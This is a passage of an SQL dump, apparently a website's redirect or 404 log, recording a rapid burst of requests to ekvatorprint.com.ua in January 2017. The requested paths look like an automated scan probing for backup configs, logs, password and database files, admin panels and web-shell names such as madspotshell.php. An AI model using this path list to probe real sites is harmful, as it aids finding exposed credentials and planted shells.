00:00:00',301),(7252,'http://ekvatorprint.com.ua/lists/config',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7253,'http://ekvatorprint.com.ua/lk/',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7254,'http://ekvatorprint.com.ua/local.properties',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7255,'http://ekvatorprint.com.ua/local-cgi/',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7256,'http://ekvatorprint.com.ua/local',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7257,'http://ekvatorprint.com.ua/local.config.rb',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7258,'http://ekvatorprint.com.ua/local.xml.additional',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7259,'http://ekvatorprint.com.ua/local.xml.template',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7260,'http://ekvatorprint.com.ua/local/composer.lock',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7261,'http://ekvatorprint.com.ua/local/composer.phar',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7262,'http://ekvatorprint.com.ua/local_bd_new.txt',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7263,'http://ekvatorprint.com.ua/local_bd_old.txt',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7264,'http://ekvatorprint.com.ua/localsettings.php.bak',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7265,'http://ekvatorprint.com.ua/linkadmin',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7266,'http://ekvatorprint.com.ua/localsettings.php.dist',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7267,'http://ekvatorprint.com.ua/localsettings.php.old',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7268,'http://ekvatorprint.com.ua/localsettings.php.save',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7269,'http://ekvatorprint.com.ua/localsettings.php.swp',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7270,'http://ekvatorprint.com.ua/localsettings.php.txt',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7271,'http://ekvatorprint.com.ua/log',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7272,'http://ekvatorprint.com.ua/log-in/',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7273,'http://ekvatorprint.com.ua/log.htm',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7274,'http://ekvatorprint.com.ua/log.',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7275,'http://ekvatorprint.com.ua/log.php',NULL,'','',6,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7276,'http://ekvatorprint.com.ua/log.html',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7277,'http://ekvatorprint.com.ua/log.mdb',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7278,'http://ekvatorprint.com.ua/log.sqlite',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7279,'http://ekvatorprint.com.ua/log/',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7280,'http://ekvatorprint.com.ua/log/access.log',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7281,'http://ekvatorprint.com.ua/log.txt',NULL,'','',2,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7282,'http://ekvatorprint.com.ua/log/access_log',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7283,'http://ekvatorprint.com.ua/log/error.log',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7284,'http://ekvatorprint.com.ua/log/development.log',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7285,'http://ekvatorprint.com.ua/log/server.log',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7286,'http://ekvatorprint.com.ua/log/error_log',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7287,'http://ekvatorprint.com.ua/log/log.log',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7288,'http://ekvatorprint.com.ua/log/production.log',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7289,'http://ekvatorprint.com.ua/log/log.txt',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7290,'http://ekvatorprint.com.ua/log/test.log',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7291,'http://ekvatorprint.com.ua/log_1.txt',NULL,'','',1,0,'2017-01-20 13:28:41','0000-00-00 00:00:00',301),(7292,'http://ekvatorprint.com.ua/log_admin.php',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7293,'http://ekvatorprint.com.ua/log_admin.',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7294,'http://ekvatorprint.com.ua/log_errors.txt',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7295,'http://ekvatorprint.com.ua/log_data/',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7296,'http://ekvatorprint.com.ua/logfile',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7297,'http://ekvatorprint.com.ua/logexpcus.txt',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7298,'http://ekvatorprint.com.ua/logfiles',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7299,'http://ekvatorprint.com.ua/localsettings.php~',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7300,'http://ekvatorprint.com.ua/logfile.txt',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7301,'http://ekvatorprint.com.ua/login.htm',NULL,'','',30,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7302,'http://ekvatorprint.com.ua/login.cgi',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7303,'http://ekvatorprint.com.ua/login.pl',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7304,'http://ekvatorprint.com.ua/login.jsp',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7305,'http://ekvatorprint.com.ua/login.html',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7306,'http://ekvatorprint.com.ua/login.rb',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7307,'http://ekvatorprint.com.ua/login.py',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7308,'http://ekvatorprint.com.ua/login.shtml',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7309,'http://ekvatorprint.com.ua/login.srf',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7310,'http://ekvatorprint.com.ua/login/admin/',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7311,'http://ekvatorprint.com.ua/login/administrator/',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7312,'http://ekvatorprint.com.ua/login/oauth/',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7313,'http://ekvatorprint.com.ua/login/cpanel.',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7314,'http://ekvatorprint.com.ua/login/cpanel.php',NULL,'','',1,0,'2017-01-20 13:28:42','0000-00-00 00:00:00',301),(7315,'http://ekvatorprint.com.ua/login/cpanel/',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7316,'http://ekvatorprint.com.ua/login_admin.php',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7317,'http://ekvatorprint.com.ua/login_admin',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7318,'http://ekvatorprint.com.ua/logins.txt',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7319,'http://ekvatorprint.com.ua/login_admin.',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7320,'http://ekvatorprint.com.ua/logo',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7321,'http://ekvatorprint.com.ua/login.',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7322,'http://ekvatorprint.com.ua/logon.php',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7323,'http://ekvatorprint.com.ua/logon.',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7324,'http://ekvatorprint.com.ua/logon',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7325,'http://ekvatorprint.com.ua/logon.html',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7326,'http://ekvatorprint.com.ua/logon.jsp',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7327,'http://ekvatorprint.com.ua/logon.htm',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7328,'http://ekvatorprint.com.ua/logon.rb',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7329,'http://ekvatorprint.com.ua/logon/logon.html',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7330,'http://ekvatorprint.com.ua/logon/logon.',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7331,'http://ekvatorprint.com.ua/login/',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7332,'http://ekvatorprint.com.ua/logon/logon.jsp',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7333,'http://ekvatorprint.com.ua/logon/logon.php',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7334,'http://ekvatorprint.com.ua/logon/logon.rb',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7335,'http://ekvatorprint.com.ua/logon/logon.py',NULL,'','',1,0,'2017-01-20 13:28:43','0000-00-00 00:00:00',301),(7336,'http://ekvatorprint.com.ua/logon/logon.shtml',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7337,'http://ekvatorprint.com.ua/logos',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7338,'http://ekvatorprint.com.ua/logs.html',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7339,'http://ekvatorprint.com.ua/logout',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7340,'http://ekvatorprint.com.ua/logs.pl',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7341,'http://ekvatorprint.com.ua/logs.mdb',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7342,'http://ekvatorprint.com.ua/logs.htm',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7343,'http://ekvatorprint.com.ua/logs.txt',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7344,'http://ekvatorprint.com.ua/logs.sqlite',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7345,'http://ekvatorprint.com.ua/logs/access_log',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7346,'http://ekvatorprint.com.ua/logon.py',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7347,'http://ekvatorprint.com.ua/logs/error_log',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7348,'http://ekvatorprint.com.ua/logs/access.log',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7349,'http://ekvatorprint.com.ua/lostpassword',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7350,'http://ekvatorprint.com.ua/logs_console/',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7351,'http://ekvatorprint.com.ua/lol.php',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7352,'http://ekvatorprint.com.ua/m',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7353,'http://ekvatorprint.com.ua/mac',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7354,'http://ekvatorprint.com.ua/madspotshell.php',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7355,'http://ekvatorprint.com.ua/logon/logon.pl',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7356,'http://ekvatorprint.com.ua/madspot.php',NULL,'','',1,0,'2017-01-20 13:28:44','0000-00-00 00:00:00',301),(7357,'http://ekvatorprint.com.ua/magazine',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7358,'http://ekvatorprint.com.ua/magmi/conf/magmi.ini',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7359,'http://ekvatorprint.com.ua/mailform.php',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7360,'http://ekvatorprint.com.ua/mail.html',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7361,'http://ekvatorprint.com.ua/mailadmin',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7362,'http://ekvatorprint.com.ua/mail',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7363,'http://ekvatorprint.com.ua/main',NULL,'','',3,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7364,'http://ekvatorprint.com.ua/mailform.',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7365,'http://ekvatorprint.com.ua/mailman',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7366,'http://ekvatorprint.com.ua/maintenance.flag.bak',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7367,'http://ekvatorprint.com.ua/maintenance.flag',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7368,'http://ekvatorprint.com.ua/main.',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7369,'http://ekvatorprint.com.ua/mainadmin',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7370,'http://ekvatorprint.com.ua/logs/error.log',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7371,'http://ekvatorprint.com.ua/maintenance.php',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7372,'http://ekvatorprint.com.ua/maintenance.flag2',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7373,'http://ekvatorprint.com.ua/maintenance/',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7374,'http://ekvatorprint.com.ua/maintenance/test.php',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7375,'http://ekvatorprint.com.ua/maintenance/test2.php',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7376,'http://ekvatorprint.com.ua/mambots/editors/fckeditor',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7377,'http://ekvatorprint.com.ua/mambots',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7378,'http://ekvatorprint.com.ua/madmin',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7379,'http://ekvatorprint.com.ua/manage/fckeditor',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7380,'http://ekvatorprint.com.ua/manage_admin',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7381,'http://ekvatorprint.com.ua/manage_main',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7382,'http://ekvatorprint.com.ua/manager/VERSION',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7383,'http://ekvatorprint.com.ua/management',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7384,'http://ekvatorprint.com.ua/manager',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7385,'http://ekvatorprint.com.ua/manager/',NULL,'','',4,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7386,'http://ekvatorprint.com.ua/manager/html/',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7387,'http://ekvatorprint.com.ua/manifest.mf',NULL,'','',1,0,'2017-01-20 13:28:45','0000-00-00 00:00:00',301),(7388,'http://ekvatorprint.com.ua/manual/index.html',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7389,'http://ekvatorprint.com.ua/manual',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7390,'http://ekvatorprint.com.ua/manuals',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7391,'http://ekvatorprint.com.ua/map',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7392,'http://ekvatorprint.com.ua/map.php',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7393,'http://ekvatorprint.com.ua/map_admin',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7394,'http://ekvatorprint.com.ua/mapadmin',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7395,'http://ekvatorprint.com.ua/mapix/doc/en/changes.html',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7396,'http://ekvatorprint.com.ua/mapping',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7397,'http://ekvatorprint.com.ua/mapix/mapix/doc/en/changes.html',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7398,'http://ekvatorprint.com.ua/market',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7399,'http://ekvatorprint.com.ua/maps',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7400,'http://ekvatorprint.com.ua/master-admin',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7401,'http://ekvatorprint.com.ua/master_admin',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7402,'http://ekvatorprint.com.ua/master.passwd',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7403,'http://ekvatorprint.com.ua/masteradmin',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7404,'http://ekvatorprint.com.ua/master/portquotes_new/admin.log',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7405,'http://ekvatorprint.com.ua/masteradmin.',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7406,'http://ekvatorprint.com.ua/mazentop-admin',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7407,'http://ekvatorprint.com.ua/manage.py',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7408,'http://ekvatorprint.com.ua/maxiadmin',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7409,'http://ekvatorprint.com.ua/mcadmin',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7410,'http://ekvatorprint.com.ua/manager/html',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7411,'http://ekvatorprint.com.ua/media/export-criteo.xml',NULL,'','',1,0,'2017-01-20 13:28:46','0000-00-00 00:00:00',301),(7412,'http://ekvatorprint.com.ua/memadmin',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7413,'http://ekvatorprint.com.ua/member',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7414,'http://ekvatorprint.com.ua/member-login',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7415,'http://ekvatorprint.com.ua/member/',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7416,'http://ekvatorprint.com.ua/member/login',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7417,'http://ekvatorprint.com.ua/member/login.php',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7418,'http://ekvatorprint.com.ua/map.',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7419,'http://ekvatorprint.com.ua/member/login.jsp',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7420,'http://ekvatorprint.com.ua/member/login.',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7421,'http://ekvatorprint.com.ua/member/login.html',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7422,'http://ekvatorprint.com.ua/member/login.py',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7423,'http://ekvatorprint.com.ua/member/login.rb',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7424,'http://ekvatorprint.com.ua/member/logon',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7425,'http://ekvatorprint.com.ua/member/signin',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7426,'http://ekvatorprint.com.ua/memberadmin',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7427,'http://ekvatorprint.com.ua/memberlist',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7428,'http://ekvatorprint.com.ua/memberadmin/',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7429,'http://ekvatorprint.com.ua/members.php',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7430,'http://ekvatorprint.com.ua/members',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7431,'http://ekvatorprint.com.ua/masteradmin.php',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7432,'http://ekvatorprint.com.ua/max-admin',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7433,'http://ekvatorprint.com.ua/members.cgi',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7434,'http://ekvatorprint.com.ua/members.csv',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7435,'http://ekvatorprint.com.ua/members.htm',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7436,'http://ekvatorprint.com.ua/members.mdb',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7437,'http://ekvatorprint.com.ua/members.log',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7438,'http://ekvatorprint.com.ua/members.jsp',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7439,'http://ekvatorprint.com.ua/members.html',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7440,'http://ekvatorprint.com.ua/members.py',NULL,'','',1,0,'2017-01-20 13:28:47','0000-00-00 00:00:00',301),(7441,'http://ekvatorprint.com.ua/members.sql.gz',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7442,'http://ekvatorprint.com.ua/members.rb',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7443,'http://ekvatorprint.com.ua/media_admin',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7444,'http://ekvatorprint.com.ua/members.shtml',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7445,'http://ekvatorprint.com.ua/members.xls',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7446,'http://ekvatorprint.com.ua/members.sqlite',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7447,'http://ekvatorprint.com.ua/members.sql',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7448,'http://ekvatorprint.com.ua/members.txt',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7449,'http://ekvatorprint.com.ua/members/',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7450,'http://ekvatorprint.com.ua/members/login',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7451,'http://ekvatorprint.com.ua/members/login.html',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7452,'http://ekvatorprint.com.ua/members/login.php',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7453,'http://ekvatorprint.com.ua/members/login.',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7454,'http://ekvatorprint.com.ua/members/login.jsp',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7455,'http://ekvatorprint.com.ua/members/logon',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7456,'http://ekvatorprint.com.ua/members/signin',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7457,'http://ekvatorprint.com.ua/membersonly',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7458,'http://ekvatorprint.com.ua/messages',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7459,'http://ekvatorprint.com.ua/menu',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7460,'http://ekvatorprint.com.ua/members.',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7461,'http://ekvatorprint.com.ua/metaadmin',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7462,'http://ekvatorprint.com.ua/mfr_admin',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7463,'http://ekvatorprint.com.ua/merchantadmin',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7464,'http://ekvatorprint.com.ua/mercurial.ini',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7465,'http://ekvatorprint.com.ua/mhadmin',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7466,'http://ekvatorprint.com.ua/microsoft',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7467,'http://ekvatorprint.com.ua/mime',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7468,'http://ekvatorprint.com.ua/mimosa-config.coffee',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7469,'http://ekvatorprint.com.ua/mimosa-config.js',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7470,'http://ekvatorprint.com.ua/misc',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7471,'http://ekvatorprint.com.ua/members.pl',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7472,'http://ekvatorprint.com.ua/mliveadmin',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7473,'http://ekvatorprint.com.ua/moadmin.php',NULL,'','',1,0,'2017-01-20 13:28:48','0000-00-00 00:00:00',301),(7474,'http://ekvatorprint.com.ua/mobile',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7475,'http://ekvatorprint.com.ua/mobile.php',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7476,'http://ekvatorprint.com.ua/mobile.',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7477,'http://ekvatorprint.com.ua/mock/',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7478,'http://ekvatorprint.com.ua/modelsearch/admin.php',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 